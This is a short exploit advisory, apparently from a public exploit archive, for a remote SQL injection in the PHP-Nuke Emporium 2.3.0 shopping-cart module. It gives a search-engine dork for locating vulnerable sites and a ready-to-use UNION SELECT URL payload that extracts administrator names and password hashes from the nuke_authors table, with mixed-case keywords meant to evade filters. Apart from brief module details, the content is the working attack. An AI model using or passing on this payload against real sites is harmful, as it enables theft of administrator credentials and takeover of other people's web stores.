The PHP-Nuke Emporium module version 2.3.0 suffers from a remote SQL injection vulnerability.
f515ef8d50509532b1b29e0436421a43aefc35393de920788cdacb2c4b0833df
||| PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability
|| Author: Hussin X
|| Home : WwW.IQ-TY.CoM<https://WwW.IQ-TY.CoM>
|| email: darkangel_g85[at]Yahoo[DoT]com
||| DorK : inurl:modules.php?name=Shopping_Cart
||| more
Module's Name: Emporium
Module's Version: 2.3.0
Module's Description: eCommerce for PHP-Nuke.
License: Burnwave Emporium License
Author's Name: Michael Squires
Module's Download https://www.burnwave.com/
Exploit
________
https://server/modules.php?name=Shopping_Cart&file=category&category_id=4+uNioN+sElEcT+'IQ-SecuritY',aid,pwd+from+nuke_authors--
end.
IQ-SecuritY FoRuM